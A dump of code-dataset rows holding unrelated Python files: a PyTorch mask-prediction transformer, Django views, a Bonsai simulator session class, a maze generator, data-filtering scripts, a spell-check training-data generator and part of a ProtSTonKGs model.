        self.decoder_layer_3 = DecoderLayer2D(h=self.decoder_layer_2.out_h
                                              , w=self.decoder_layer_2.out_w
                                              , channels=self.decoder_layer_2.out_channels
                                              , expansion=1
                                              , q1_out_channels=32
                                              , q1_kernel=7
                                              , q1_stride=1
                                              , q1_padding=3
                                              , k1_out_channels=32
                                              , k1_kernel=7
                                              , k1_stride=1
                                              , k1_padding=3
                                              , v1_out_channels=32
                                              , v1_kernel=7
                                              , v1_stride=1
                                              , v1_padding=3
                                              , transform1_kernel=1
                                              , transform1_stride=1
                                              , transform1_padding=0
                                              , kv_h=kvs_h[-3]
                                              , kv_w=kvs_w[-3]
                                              , kv_channels=kvs_channels[-3]
                                              , q2_out_channels=32
                                              , q2_kernel=7
                                              , q2_stride=1
                                              , q2_padding=3
                                              , k2_out_channels=32
                                              , k2_kernel=7
                                              , k2_stride=1
                                              , k2_padding=3
                                              , v2_out_channels=32
                                              , v2_kernel=7
                                              , v2_stride=1
                                              , v2_padding=3
                                              , transform2_kernel=1
                                              , transform2_stride=1
                                              , transform2_padding=0
                                              , ff_out_channels=16
                                              , ff_kernel=3
                                              , ff_stride=1
                                              , ff_padding=1
                                              , target_h=h
                                              , target_w=w
                                              , upsample_out_channels=8
                                              , upsample_kernel=3
                                              , upsample_stride=1
                                              , upsample_padding=1)
        # output size is (B, 1, 8, 256, 256)
    def forward(self, img_seq, embeddings):
        """Decode img_seq against the encoder's multi-scale `embeddings` list."""
        # Encode the input and keep only the deepest embedding as the query stream.
        img_seq = self.encoder(img_seq)[-1]
        # Decode deepest -> shallowest against the matching encoder embeddings.
        img_seq = self.decoder_layer_1(img_seq, embeddings[-1])
        img_seq = self.decoder_layer_2(img_seq, embeddings[-2])
        img_seq = self.decoder_layer_3(img_seq, embeddings[-3])
        return img_seq
class AirTransformer2D(nn.Module):
    """Iterative mask-prediction model over 256x256 images.

    For each of `steps` iterations it decodes the current scope against the
    encoded input images, predicts a sigmoid mask, and shrinks the scope by
    that mask so later steps attend to the remaining region. The stacked
    per-step masks are returned with shape (B, steps, 1, H, W).
    """
    def __init__(self, steps):
        super().__init__()
        self.steps = steps
        self.encoder = Encoder2D(256, 256, 3, [2, 2, 2])
        self.decoder = Decoder2D(256, 256, 1, [125, 60, 27], [125, 60, 27], [32, 32, 64])
        # 12 input channels = 3 (imgs) + 1 (scopes) + 8 (decoder output).
        self.conv = nn.Conv2d(12, 1, kernel_size=1, stride=1, padding=0)
    def forward(self, imgs, scopes):
        """Return per-step masks for `imgs` given the initial `scopes`."""
        img_seq = torch.unsqueeze(imgs, 1)
        scope_seq = torch.unsqueeze(scopes, 1)
        embeddings = self.encoder(img_seq)
        mask_seq = []
        for idx in range(self.steps):
            # Predict a mask from the image, current scope and decoded features.
            masks = torch.sigmoid(self.conv(torch.cat((imgs, scopes, self.decoder(scope_seq, embeddings).squeeze(dim=1)), dim=1)))
            # Remove the freshly masked region from the scope for the next step.
            scopes = (1 - masks) * scopes
            scope_seq = torch.unsqueeze(scopes, 1)
            mask_seq.append(masks)
        return torch.stack(mask_seq, dim=1)
|
996,824 | 2223aec1e4b37724251b8fc3506645787b877345 | from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
__all__ = ['Related', 'RelatedInterface']
class RelatedInterface(ApiInterfaceBase):
    """Declares the fields of a "related" API entity: name, id and type.

    `AnyType` comes from the project's mapper types — presumably a permissive
    placeholder; the concrete runtime types are resolved by the mapper.
    """
    name: AnyType
    id: int
    type: AnyType
class Related(PropertyMapper, RelatedInterface):
    """Concrete "related" model: PropertyMapper supplies the mapping behavior
    for the fields declared on RelatedInterface."""
    pass
|
996,825 | dbccf38dd819e947232e5cef74eb52ff5709f46c | # Given a list of numbers and a number k, return whether any two numbers from the list add up to k.
# For example, given [10, 15, 3, 7] and k of 17, return true since 10 + 7 is 17.
# Bonus: Can you do this in one pass?
array = [10, 15, 3, 7]  # sample input list
k = 16  # target sum
# Sorting is not required by the pair search below; kept for the printed output.
array.sort()
print(array)
def doNumbersAddUp(array, k):
    """Return True if two distinct elements of `array` sum to k, else False.

    Single pass with a set of previously seen values: for each value, check
    whether its complement (k - value) appeared earlier. This fixes the
    original double loop, which paired an element with itself (e.g. [8] with
    k=16 incorrectly returned True) and ran in O(n^2) instead of O(n).
    """
    seen = set()
    for value in array:
        if k - value in seen:
            return True
        seen.add(value)
    return False
print(doNumbersAddUp(array, k))
|
996,826 | 39ba870f705f9edb3932fbea0c902182891062bb | from django.http import HttpResponse
from django.shortcuts import render
def home(request):
    """Render the home page template."""
    return render(request,'home.html')
def count(request):
    """Count the words in the submitted ``fulltext`` and render the result.

    Renders count.html with the word count ``l`` and the original text, or
    Notfound.html when no words were submitted.

    Uses str.split() with no argument so runs of whitespace do not produce
    empty "words": the original split(' ') counted consecutive spaces as
    extra words and treated input with a leading space as empty.
    """
    s = request.GET['fulltext']
    words = s.split()
    if words:
        return render(request, 'count.html', {'l': len(words), 'fulltext': s})
    return render(request, 'Notfound.html')
def about(request):
    """Render the about page template."""
    return render(request,'about.html')
996,827 | e9ecc0a06269ca7b2e9b02c4bb224b2c92cbf32c | """
Simulator session base class for bonsai3 library
"""
__copyright__ = "Copyright 2020, Microsoft Corp."
# pyright: strict
import abc
import logging
import sys
import numpy as np
import signal
import time
from functools import partial
from types import FrameType
from typing import Dict, Any, Optional, List
import jsons
from microsoft_bonsai_api.simulator.client import BonsaiClient, BonsaiClientConfig
from microsoft_bonsai_api.simulator.generated.models import (
Event,
EventType,
SimulatorInterface,
SimulatorSessionResponse,
SimulatorState,
)
# Module-wide logger: timestamped "[time][LEVEL] message" lines at INFO level.
logFormatter = "[%(asctime)s][%(levelname)s] %(message)s"
logging.basicConfig(format=logFormatter, datefmt="%Y-%m-%d %H:%M:%S")
log = logging.getLogger(__name__)
log.setLevel(level=logging.INFO)
# Alias for the JSON-like dicts exchanged with the Bonsai platform.
Schema = Dict[str, Any]
def default_numpy_bool_serializer(np_bool: np.bool_, **kwargs: Dict[str, Any]) -> bool:
    """Convert a numpy boolean scalar to the built-in ``bool``.

    :param np_bool: the numpy boolean scalar to convert.
    :param kwargs: accepted (and ignored) to match the jsons serializer
        signature.
    :return: the equivalent native Python bool.
    """
    return bool(np_bool)
jsons.set_serializer(default_numpy_bool_serializer, np.bool_)
def default_numpy_number_serializer(
    np_number: np.number, **kwargs: Dict[str, Any]
) -> object:
    """Convert a numpy numeric scalar to its native Python counterpart.

    :param np_number: the numpy int/float scalar to convert.
    :param kwargs: accepted (and ignored) to match the jsons serializer
        signature.
    :return: the equivalent native Python int or float.
    """
    native = np_number.item()
    return native
jsons.set_serializer(default_numpy_number_serializer, np.number)
def default_numpy_array_serializer(
    np_array: np.ndarray, **kwargs: Dict[str, Any]
) -> List[Any]:
    """
    Serialize the given numpy array to a (possibly nested) native list.

    The array is first converted with ``tolist()`` and the result is passed
    through jsons' iterable serializer so that the elements themselves are
    serialized recursively.
    :param np_array: the numpy array instance that is to be serialized.
    :param kwargs: forwarded to jsons' iterable serializer.
    :return: list with the serialized array contents.
    """
    native_list = np_array.tolist()
    return jsons.default_iterable_serializer(native_list, **kwargs)
# Teach jsons to emit numpy arrays as JSON lists.
jsons.set_serializer(default_numpy_array_serializer, np.ndarray)
class SimulatorSession(abc.ABC):
    """Abstract base class for a Bonsai simulator session.

    Subclasses implement get_state / get_interface / halted and the
    episode_start / episode_step callbacks. run() performs one
    register-or-advance step per call against the Bonsai platform and
    returns False when the simulator should stop.
    """
    # Class-level defaults; re-assigned per instance in __init__.
    _registered = None  # type: Optional[SimulatorSessionResponse]
    _sequence_id = 1  # type: int
    _last_event = None  # type: Optional[Event]
    def __init__(self, config: BonsaiClientConfig, *, log_dispatch: bool = True):
        self._config = config
        self._registered = None
        self._client = BonsaiClient(config)
        self._sequence_id = 1
        # When True, run() logs every event type received from the platform.
        self._log_dispatch = log_dispatch
    @property
    def attach_to_sigterm(self):
        """Indicates if the session should handle the sigterm.
        By default we are handling the sigterm but a subclass
        could override this property to change the behavior.
        """
        return True
    # interface and state
    def get_state(self) -> Schema:
        """Called to retrieve the current state of the simulator. """
        raise NotImplementedError("get_state not implemented.")
    def get_interface(self) -> SimulatorInterface:
        """Called to retrieve the simulator interface during registration. """
        raise NotImplementedError("get_interface not implemented.")
    def get_simulator_context(self) -> str:
        """
        Called to retrieve the simulator context field for the SimulatorInterface.
        """
        return self._config.simulator_context or ""
    def halted(self) -> bool:
        """
        Should return whether the episode is halted, and
        no further action will result in a state.
        """
        raise NotImplementedError("halted not implemented.")
    # callbacks
    def registered(self):
        """Called after simulator is successfully registered. """
        log.info("Registered.")
        pass
    @abc.abstractmethod
    def episode_start(self, config: Schema) -> None:
        """Called at the start of each episode. """
        raise NotImplementedError("episode_start not implemented.")
    @abc.abstractmethod
    def episode_step(self, action: Schema) -> None:
        """Called for each step of the episode. """
        raise NotImplementedError("episode_step not implemented.")
    def episode_finish(self, reason: str) -> None:
        """Called at the end of an episode. """
        pass
    def idle(self, callback_time: float):
        """Called when the simulator should idle and perform no action. """
        log.info("Idling for {} seconds...".format(callback_time))
        if callback_time > 0:
            time.sleep(callback_time)
    def unregistered(self, reason: str):
        """Called when the simulator has been unregistered and should exit. """
        log.info("Unregistered, Reason: {}".format(reason))
        pass
    def run(self) -> bool:
        """
        Runs simulator. Returns false when the simulator should exit.
        Example usage:
            ...
            mySim = MySimulator(config)
            while mySim.run():
                continue
            ...
        returns True if the simulator should continue.
        returns False if the simulator should exit its simulation loop.
        """
        # Boolean used to determine if we should attempt to unregister simulator
        unregister = False
        try:
            if self._registered is None:
                # First call: register the session with the platform.
                log.info("Registering Sim")
                self._registered = self._client.session.create(
                    self._config.workspace, self.get_interface()
                )
                # Attach SIGTERM handler to attempt to unregister sim when a SIGTERM is detected
                if self.attach_to_sigterm and (
                    sys.platform == "linux" or sys.platform == "darwin"
                ):
                    signal.signal(
                        signal.SIGTERM, partial(_handleSIGTERM, sim_session=self)
                    )
                self.registered()
                return True
            else:
                session_id = self._registered.session_id
                # TODO: Figure out what to do here. Moab sim has a complex type in its
                # state (numpy.float)
                # Workaround is the following two lines and the custom jsons
                # serializer added at the beginning of the module. The swagger
                # libraries do not like it.
                original_state = self.get_state()
                state = jsons.dumps(original_state)
                state = jsons.loads(state)
                sim_state = SimulatorState(
                    sequence_id=self._sequence_id,
                    state=state,
                    halted=self.halted(),
                )
                self._last_event = self._client.session.advance(
                    self._config.workspace, session_id, body=sim_state
                )  # # type: Event
                self._sequence_id = self._last_event.sequence_id
                if self._log_dispatch:
                    log.info("Received event: {}".format(self._last_event.type))
                keep_going = self._dispatch_event(self._last_event)
                if keep_going is False:
                    log.debug(
                        "Setting flag to indicate that sim should attempt to unregister."
                    )
                    unregister = True
                return keep_going
        except KeyboardInterrupt:
            unregister = True
        except Exception as err:
            unregister = True
            log.exception("Exiting due to the following error: {}".format(err))
            raise err
        finally:
            # Best-effort cleanup; runs on normal stop, Ctrl-C and errors alike.
            if unregister:
                self.unregister()
        return False
    def _dispatch_event(self, event: Event) -> bool:
        """
        Examines the SimulatorEvent and calls one of the
        dispatch functions for the appropriate event.
        return false if there are no more events.
        """
        if event.type == EventType.episode_start.value and event.episode_start:
            self.episode_start(event.episode_start.config)
        elif event.type == EventType.episode_step.value and event.episode_step:
            self.episode_step(event.episode_step.action)
        elif event.type == EventType.episode_finish.value and event.episode_finish:
            self.episode_finish(event.episode_finish.reason)
        elif event.type == EventType.idle.value and event.idle:
            try:
                self.idle(event.idle.callback_time)
            except AttributeError:
                # callbacktime is always 0. Sometimes the attribute is missing.
                # Idle for 0 seconds if attribute is missing.
                self.idle(0)
        elif event.type == EventType.unregister.value and event.unregister:
            log.info("Unregister reason: {}.".format(event.unregister.reason))
            return False
        return True
    def unregister(self):
        """ Attempts to unregister simulator session"""
        if self._registered:
            try:
                log.info("Attempting to unregister simulator.")
                self._client.session.delete(
                    self._config.workspace,
                    session_id=self._registered.session_id,
                )
                # Fire the unregistered() callback only when the platform told
                # us to unregister (vs. a locally initiated shutdown).
                if (
                    self._last_event is not None
                    and self._last_event.type == EventType.unregister.value
                    and self._last_event.unregister
                ):
                    self.unregistered(self._last_event.unregister.reason)
                log.info("Successfully unregistered simulator.")
            except Exception as err:
                log.error("Unregister simulator failed with error: {}".format(err))
def _handleSIGTERM(
    signalType: int, frame: FrameType, sim_session: SimulatorSession
) -> None:
    """ Attempts to unregister sim when a SIGTERM signal is detected """
    # Installed via functools.partial in SimulatorSession.run(); terminates
    # the process after the best-effort unregister.
    log.info("Handling SIGTERM.")
    sim_session.unregister()
    log.info("SIGTERM Handled, exiting.")
    sys.exit()
|
996,828 | fde23e8d38fdc0f4c083b002217088a5f6fe32fa | """This file contains functions to randomly generate mazes.
The main function in this file is generate_random_maze_matrix(), which generates
a maze with no dead ends and no open squares.
"""
import numpy as np
# Safety cap on while-loop iterations before giving up.
_MAX_ITERS = int(1e5)
def _get_neighbors(size, point):
"""Get indices of point's neighbors in square matrix of size `size`.
Unless point (i, j) is on the boundary of the size x size square, this will
be a list of 4 elements.
Args:
size: Int.
point: Tuple of ints (i, j). Must satisfy 0 <= i, j < size.
Returns:
neighbors: List of tuples. Length 2 (if point is a corner), 3 (if point
is on an edge), or 4 (if point is in the interior).
"""
i, j = point
neighbors = [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)]
_valid_neighbor = lambda neighbor: all(0 <= x < size for x in neighbor)
neighbors = list(filter(_valid_neighbor, neighbors))
return neighbors
def _get_containing_blocks(size, point):
"""Get 2x2 blocks containing point in open maze of size `size`.
Unless point is on the boundary of the size x size square, there will be 4
containing 2x2 blocks.
Args:
size: Int.
point: Tuple of ints (i, j). Must satisfy 0 <= i, j < size.
Returns:
block_inds: List of tuples. If (k, l) is in block_inds, then point
(i, j) is in {(k, l), (k + 1, l), (k, l + 1), (k + 1, l + 1)}.
"""
i, j = point
block_inds = []
if i > 0:
if j > 0:
block_inds.append((i - 1, j - 1))
if j < size - 1:
block_inds.append((i - 1, j))
if i < size - 1:
if j > 0:
block_inds.append((i, j - 1))
if j < size - 1:
block_inds.append((i, j))
return block_inds
def _remove_dead_ends(maze):
    """Fill in dead ends of `maze` in place until none remain.

    A dead end is an open cell (value 0) with fewer than two open neighbors.
    Filling one dead end can create another, so the scan restarts after each
    fill and stops only once a complete pass finds nothing to fill.

    Args:
        maze: N x N binary matrix (1 = wall, 0 = open), modified in place.
    """
    size = maze.shape[0]
    def _fill_one_dead_end():
        # Fill the first dead end encountered; True if something was filled.
        for r in range(size):
            for c in range(size):
                if maze[r, c]:  # wall, nothing to check
                    continue
                open_count = np.sum(
                    [1 - maze[p, q] for p, q in _get_neighbors(size, (r, c))])
                if open_count < 2:
                    maze[r, c] = 1
                    return True
        return False
    while _fill_one_dead_end():
        pass
def generate_random_maze_matrix(size, ambient_size=None):
    """Generate a random maze matrix.
    The maze matrix generated has no open points (e.g. no four open cells
    sharing a vertex), no dead ends (e.g. each open point has at least two open
    neighbors), and is one connected component.
    The way this generator works is it starts will a single open cell (all other
    cells are walls). Then it iteratively adds closed neighbors, as long as
    opening them doesn't open up a block. Once there are no more such neighbors,
    it iteratively fills in all dead ends. The result is the final maze matrix
    (unless it is all walls, in which case the function recurses to try again).
    Args:
        size: Int. Size (height and width) of the maze.
        ambient_size: Size of the final maze matrix. This can be larger than
            `size` to add some visible wall border around the maze. If None, no
            wall border around the maze is produced.
    Returns:
        Binary numpy matrix, 1 = wall and 0 = open; shape is
        (ambient_size, ambient_size) when ambient_size > size, else
        (size, size).
    """
    maze = np.ones((size, size))
    # Start from a random point and recursively open points
    closed_neighbors = []  # Closed points that are neighbors of open points
    def _open_point(point):
        # Open a point and add its neighbors to closed_neighbors
        for p in _get_neighbors(size, point):
            if maze[p[0], p[1]] and p not in closed_neighbors:
                closed_neighbors.append(p)
        maze[point[0], point[1]] = 0
    def _find_and_open_new_point():
        # Find a closed neighbor that can be opened without creating an open
        # block, open it, and return True. If no such point exists, return
        # False.
        np.random.shuffle(closed_neighbors)
        for new_point in closed_neighbors:
            if not maze[new_point[0], new_point[1]]:
                # Already opened on a previous iteration.
                continue
            # Opening is rejected if any containing 2x2 block would end up
            # fully open (sum <= 1 wall before opening this point).
            will_make_open_block = any([
                np.sum(maze[i: i + 2, j: j + 2]) <= 1
                for i, j in _get_containing_blocks(size, new_point)
            ])
            if not will_make_open_block:
                _open_point(new_point)
                return True
        return False
    # Seed the maze and iteratively open points
    _open_point(tuple(np.random.randint(0, size, size=(2,))))
    points_to_add = True
    while points_to_add:
        points_to_add = _find_and_open_new_point()
    # Remove dead ends
    _remove_dead_ends(maze)
    # If maze has no open points, recurse to generate a new one
    if np.sum(1 - maze) == 0:
        return generate_random_maze_matrix(size, ambient_size=ambient_size)
    # Add wall border if necessary
    if ambient_size is not None and ambient_size > size:
        maze_with_border = np.ones((ambient_size, ambient_size))
        start_index = (ambient_size - size) // 2
        maze_with_border[start_index: start_index + size,
                         start_index: start_index + size] = maze
        maze = maze_with_border
    return maze
def _generate_open_blob(maze, num_points):
    """Try to generate an open connected blob of points in the maze.

    Args:
        maze: Instance of .maze.Maze.
        num_points: Int. Number of connected points to have in the blob.

    Returns:
        blob_matrix: False or binary matrix of same size as maze. Ones
            correspond to points in the connected open blob. If False, then
            could not generate a valid blob.
    """
    neighbor_dict = maze.get_neighbor_dict()

    # Seed the blob with a starting point
    blob = [maze.sample_open_point()]

    def _get_candidate_new_blob_point():
        # New potential new blob point from neighbors of existing blob point
        candidate_root = blob[np.random.randint(len(blob))]  #pylint: disable=invalid-sequence-index
        neighbors = neighbor_dict[candidate_root]
        candidate = neighbors[np.random.randint(len(neighbors))]
        return candidate

    def _add_point():
        # Add a new point to the blob. Returns True on success, False when no
        # valid candidate was found within _MAX_ITERS attempts.
        #
        # Bug fix: the iteration cap is now checked *before* `continue`. In
        # the original, `continue` on an invalid candidate skipped the
        # `count > _MAX_ITERS` guard, so this loop could spin forever once
        # every reachable candidate was already in the blob.
        count = 0
        while True:
            count += 1
            if count > _MAX_ITERS:
                return False
            candidate = _get_candidate_new_blob_point()
            # NOTE(review): `not candidate` only triggers for falsy candidates
            # (None / empty tuple); ordinary (i, j) tuples are always truthy.
            if not candidate or candidate in blob:
                continue
            blob.append(candidate)
            return True

    # Add num_points points to the blob if possible, else return False.
    for _ in range(num_points - 1):
        if not _add_point():
            return False

    # Convert the list of blob points to a matrix
    blob_matrix = np.zeros_like(maze.maze)
    for (i, j) in blob:
        blob_matrix[i, j] = 1
    return blob_matrix
def get_connected_open_blob(maze, num_points):
    """Generate an open connected blob of `num_points` points in the maze.

    Retries _generate_open_blob until it yields a matrix, raising after
    _MAX_ITERS failed attempts.

    Args:
        maze: Instance of .maze.Maze.
        num_points: Int. Number of connected points to have in the blob.

    Returns:
        blob_matrix: Binary matrix of same size as maze. Ones correspond to
            points in the connected open blob.

    Raises:
        ValueError: If no valid blob was produced within _MAX_ITERS attempts.
    """
    for _ in range(_MAX_ITERS):
        blob_matrix = _generate_open_blob(maze, num_points)
        # _generate_open_blob signals failure by returning the bool False.
        if not isinstance(blob_matrix, bool):
            return blob_matrix
    raise ValueError('Could not generate an open connected blob.')
|
996,829 | ab806de07d36635a59e031b610df681023383076 | import plotly.express as px
import csv
import numpy as np
def getDataSource(data_path):
    """Read the CSV at `data_path` and return {"x": marks, "y": attendance}.

    The file must have the columns "Marks In Percentage" and "Days Present";
    every value is converted to float.
    """
    marks = []
    attendance = []
    with open(data_path) as csv_file:
        for record in csv.DictReader(csv_file):
            marks.append(float(record["Marks In Percentage"]))
            attendance.append(float(record["Days Present"]))
    return {"x": marks, "y": attendance}
def findCorrelation(datasource):
    """Print and return the Pearson correlation between the two data series.

    Args:
        datasource: Dict with equal-length numeric sequences under keys
            "x" and "y" (as produced by getDataSource).

    Returns:
        The Pearson correlation coefficient as a float. The original only
        printed the value and returned None; returning it keeps existing
        callers working while making the function usable programmatically.
    """
    correlation = np.corrcoef(datasource["x"], datasource["y"])[0, 1]
    print(correlation)
    return correlation
def setup():
    """Load the student marks CSV and print the marks/attendance correlation."""
    # NOTE(review): the CSV path is resolved relative to the current working
    # directory — run the script from the folder containing the file.
    dp = "Student Marks vs Days Present.csv"
    ds = getDataSource( dp )
    findCorrelation(ds)
setup()
|
996,830 | 4aaeab4316c3a6bc95edf87068fde3f5c7c537b3 | # -*- coding: utf-8 -*-
from PyQt5 import QtWidgets
from src.ui.main_ui.UiMain import UiMain
# Application entry point: create the Qt app, show the main window, and hand
# control to the Qt event loop until the window closes.
if __name__ == '__main__':
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = UiMain()
    MainWindow.show()
    # exec_() blocks until the event loop exits; its status becomes the
    # process exit code.
    sys.exit(app.exec_())
|
996,831 | 477e3dc397ea14d7cf57b9698384ca1710dfbed0 | x = min(inp[2*cur+2], inp[2*cur+1])
inp[cur] = x
inp[2*cur+1] -= x
i |
996,832 | 8e8bf0475245def7ea91df0d00778c5ae43ab658 | from django.urls import path
from . import views
# URL routes for this app: listing, detail (keyed by integer id) and search.
urlpatterns = [
    path('', views.carros, name='carros'),
    path('<int:id>', views.car_detalle, name='car_detalle'),
    path('search', views.search, name='search'),
]
|
996,833 | e3e76a7a012188beb4426b0f036fe1206d8b7261 | #!/usr/bin/env python
# encoding: utf-8
"""
filter-hospitals.py
Created by Christian Swinehart on 2019/11/26.
Copyright (c) 2019 Samizdat Drafting Co. All rights reserved.
"""
import os
from csv import DictReader, DictWriter
_root = os.path.dirname(os.path.abspath(__file__))
def main():
    """Filter the large hospital-locations CSV down to general hospitals.

    Reads data/HospitalLocationsLg.csv (relative to the working directory),
    keeps only rows whose NAICS_DESC is
    'GENERAL MEDICAL AND SURGICAL HOSPITALS', and writes them with the same
    header to data/HospitalLocationsGeneral.csv.

    Fixes vs. the original: the reader file handle is now closed via `with`
    (it was leaked), the output uses newline='' as the csv module requires on
    Python 3, and the Python 2 `print` statement is now a print() call so the
    script runs on Python 3.
    """
    # read in the whole huge csv
    with open('data/HospitalLocationsLg.csv') as source:
        reader = DictReader(source)
        headers = reader.fieldnames

        # create a new csv file to which we'll add any rows from the original
        # that make the cut
        with open('data/HospitalLocationsGeneral.csv', 'w', newline='') as f:
            writer = DictWriter(f, fieldnames=headers)
            writer.writeheader()

            # step through each of the rows from the original and keep only
            # those whose NAICS description matches
            for row in reader:
                if row['NAICS_DESC'] == 'GENERAL MEDICAL AND SURGICAL HOSPITALS':
                    writer.writerow(row)
            print('wrote matching rows to', f.name)
# When run as a script, work from the directory containing this file so the
# relative data/ paths resolve, then run the filter.
if __name__ == "__main__":
    os.chdir(_root)
    main()
|
996,834 | ed7114f96a31a9c34e7f85baed34fe19f612704a | '''
Here we train spell checker model which is Seq2Seq model
based on different operations in 2 Levenstein len
'''
from zipfile import ZipFile, ZIP_DEFLATED
from io import BytesIO
import torch
import time
import numpy as np
import math
import yaml
import shutil
import sys
import random
import re
import os
import transformer
import pickle
from pathlib import Path
import json
import argparse
from transformers import get_linear_schedule_with_warmup
from torchtext.vocab import Vocab, vocab
from collections import OrderedDict, Counter
from dataset import Seq2SeqDataset
from torch.utils.data import DataLoader
from utils import cer, accuracy
import string
import wandb
import pickle
import re
from tqdm import tqdm
from nltk.tokenize import word_tokenize
# Global RNG seed for reproducible training runs.
SEED = 1337
# Punctuation set extended with digits and the typographic apostrophe
# (presumably used to filter tokens downstream — usage not shown here).
punctuation = string.punctuation + '1234567890’'
def set_seed(seed=42, set_torch=True):
    """Seed the python, numpy and (optionally) torch RNGs for reproducibility."""
    random.seed(seed)
    np.random.seed(seed)
    os.environ["PYTHONHASHSEED"] = str(seed)
    if not set_torch:
        return
    # Make CUDA / cuDNN deterministic as well (disables autotuned kernels).
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
# Seed everything before any data shuffling / model init happens below.
set_seed(SEED)
# Default Seq2Seq transformer hyperparameters; presumably merged with the JSON
# passed via -x/--hyperparameters elsewhere — not consumed in this visible
# section of the script (TODO confirm against the training code).
default_hyperparameters = {
    'd_model': 64,
    'nhead': 8,
    'num_encoder_layers': 4,
    'num_decoder_layers': 4,
    'dim_feedforward': 256,
    'dropout': 0.05,
}
def candidates(word):
    """Return up to 100 random 1–2 edit-distance corruptions of `word`, plus `word` itself."""
    pool = set(edits1(word)) | set(edits2(word))
    shuffled = list(pool)
    random.shuffle(shuffled)
    return shuffled[:100] + [word]
def edits1(word):
    """All strings that are exactly one edit operation away from `word`."""
    letters = 'abcdefghijklmnopqrstuvwxyz '
    results = set()
    for cut in range(len(word) + 1):
        left, right = word[:cut], word[cut:]
        if right:
            results.add(left + right[1:])                   # deletion
            for ch in letters:                              # replacement
                results.add(left + ch + right[1:])
        if len(right) > 1:                                  # transposition
            results.add(left + right[1] + right[0] + right[2:])
        for ch in letters:                                  # insertion
            results.add(left + ch + right)
    return results
def edits2(word):
    """All strings reachable from `word` by applying two single-edit steps."""
    return {twice for once in edits1(word) for twice in edits1(once)}
# ---------------------------------------------------------------------------
# CLI: build a (correct word -> corrupted word) training corpus for the
# spell-check model from the raw text file given via -i/--data-input.
# ---------------------------------------------------------------------------
parser = argparse.ArgumentParser(
    description="Train the model on dataset",
    formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
    "-m", "--model", help="Model architecture: currently only transformer", default="transformer")
parser.add_argument("-i", "--data-input", type=Path,
                    help="Specify file with input sequences", required=True)
parser.add_argument("-x", "--hyperparameters", type=json.loads,
                    help="Specify model hyperparameters", default='{}')
parser.add_argument("-e", "--max-epochs", type=int,
                    help="Maximum epochs count", default=250)
parser.add_argument("-l", "--log-interval", type=int,
                    help="Training logging interval", default=503)
parser.add_argument("-c", "--checkpoint-every", type=int,
                    help="Save checkpoint every N epochs", default=50)
parser.add_argument("--checkpoint-dir", type=Path,
                    help="Directory where to save checkpoints", default=Path("./checkpoints"))
parser.add_argument("-b", "--batch-size",
                    help="Batch size", type=int, default=32)
parser.add_argument("--lr", help="Learning rate", type=float, default=1e-3)
parser.add_argument("-d", "--device", help="Device: CPU or GPU", default="cuda")
args = parser.parse_args()

# Recreate the output directory from scratch.
# Bug fix: the original bare `except:` swallowed every exception, including
# KeyboardInterrupt/SystemExit; only ignore OS-level removal errors.
try:
    shutil.rmtree('examples/spell-check/')
except OSError:
    pass
os.mkdir('examples/spell-check/')

# Bug fix: the input file was never closed; use a context manager.
with open(args.data_input) as f:
    data_input = f.read().split('\n')[:-1]

# Strip ASCII punctuation and flatten the corpus into a list of words.
data = []
punct = string.punctuation
for d in data_input:
    d = ''.join([c for c in d if not c in punct])
    data += d.split()

# For every word, emit its random corruptions (plus the word itself) so that
# X[i] is the intended word and y[i] a noisy variant.
X = []
y = []
for d in tqdm(data):
    cand = list(candidates(d))
    X += [d] * len(cand)
    y += cand

with open('examples/spell-check/input.txt', 'w', encoding='utf-8') as f:
    f.write('\n'.join(X))
with open('examples/spell-check/target.txt', 'w', encoding='utf-8') as f:
    f.write('\n'.join(y))
996,835 | a8333756ca8a2856aefe89a4af6986e9dc3f0845 | # -*- coding: utf-8 -*-
"""ProtSTonKGs model architecture components."""
from __future__ import annotations
import logging
from dataclasses import dataclass
from functools import lru_cache
from typing import Optional
import torch
from torch import nn
from transformers import (
BertModel,
BigBirdConfig,
BigBirdForPreTraining,
BigBirdTokenizer,
)
from transformers.models.big_bird.modeling_big_bird import (
BigBirdForPreTrainingOutput,
BigBirdLMPredictionHead,
)
from stonkgs.constants import (
NLP_MODEL_TYPE,
PROTSTONKGS_MODEL_TYPE,
PROT_EMBEDDINGS_PATH,
PROT_SEQ_MODEL_TYPE,
)
from stonkgs.models.kg_baseline_model import prepare_df
# Initialize logger
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
@dataclass
class BigBirdForPreTrainingOutputWithPooling(BigBirdForPreTrainingOutput):
    """Overriding the BigBirdForPreTrainingOutput class to further include the pooled output."""

    # Pooled encoder output (filled from the second element of the encoder
    # outputs in ProtSTonKGsForPreTraining.forward); optional so the base
    # class's fields keep working when it is absent.
    pooler_output: Optional[torch.FloatTensor] = None
class ProtSTonKGsPELMPredictionHead(BigBirdLMPredictionHead):
    """Custom masked protein, entity and language modeling (PELM) head for proteins, entities and text tokens."""

    def __init__(
        self,
        config,
        kg_start_idx: int = 768,
        prot_start_idx: int = 1024,
    ):
        """Initialize the PELM head based on the (hyper)parameters in the provided config.

        :param config: Model config; must expose hidden_size plus lm_vocab_size,
            kg_vocab_size and prot_vocab_size (the latter three are added to the
            BigBird config by ProtSTonKGsForPreTraining).
        :param kg_start_idx: Sequence position where the KG part starts (text ends).
        :param prot_start_idx: Sequence position where the protein part starts (KG ends).
        """
        # NOTE(review): super().__init__ (BigBirdLMPredictionHead) provides the
        # `self.transform` and `self.decoder` attributes used/linked below.
        super().__init__(config)
        # Initialize the KG and protein part start indices
        self.kg_start_idx = kg_start_idx
        self.prot_start_idx = prot_start_idx
        # There are three different "decoders":
        # 1. The text part of the sequence that is projected onto the dimension of the text vocabulary index
        # 2. The KG part of the sequence that is projected onto the dimension of the kg vocabulary index
        # 3. The protein sequence part that is projected onto the dimension of the protein vocabulary index
        # 1. Text decoder
        self.text_decoder = nn.Linear(config.hidden_size, config.lm_vocab_size, bias=False)
        # 2. KG/Entity decoder
        self.entity_decoder = nn.Linear(config.hidden_size, config.kg_vocab_size, bias=False)
        # 3. Protein decoder
        self.prot_decoder = nn.Linear(config.hidden_size, config.prot_vocab_size, bias=False)
        # Set the biases differently for the decoder layers
        self.text_bias = nn.Parameter(torch.zeros(config.lm_vocab_size))
